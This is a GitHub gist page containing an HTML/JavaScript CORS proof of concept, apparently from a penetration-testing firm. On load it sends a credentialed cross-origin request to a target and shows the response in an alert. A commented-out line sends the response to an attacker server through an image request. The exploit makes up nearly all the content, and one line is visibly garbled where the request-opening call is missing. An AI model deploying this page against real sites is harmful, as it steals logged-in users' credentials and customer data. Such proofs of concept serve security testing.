Skip to content

Instantly share code, notes, and snippets.

Created June 30, 2020 15:15
What would you like to do?
<title>CORS PoC</title>
<script language="JavaScript"> function date(){var date = new Date(); document.getElementById("date").innerHTML = date;}</script>
<!-- GUI -->
<body onload="cors(); date();">
<h1>Pentest Factory GmbH CORS PoC</h1>
<table align="left" style="position: absolute; border-spacing: 15px">
<td width="100px"><img src="" width="100px" height="100px"/></td>
<td width="700px" style="font-size: 10pt"><b>Any logged in user account visiting this website will <u>automatically</u> issue a CORS request <u>with supplied credentials</u>, which's response can be captured by an attacker. The response may contain <u>sensitive data</u> such as <u>credentials</u> or <u>customer data</u>!</b><br><br><label id="date" style="font-size: 0.85em;"></label></td>
<label style="position:absolute; margin-top: 170px" id="data"></label>
<!-- CORS -->
var METHOD = "POST";
var URL = "";
var ATKSRV = "";
function cors(){
var xhr = new XMLHttpRequest();, URL, true);
xhr.withCredentials = true;
xhr.onreadystatechange = function () {
if (xhr.readyState == 4){
// steal sensitive data from CORS response and send it to an attacker's server
//new Image().src = ATKSRV + xhr.responseText
// just alert the CORS response in an JavaScript popup as proof of concept
alert('Sensitive data has been stolen:\n\n' + xhr.responseText);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment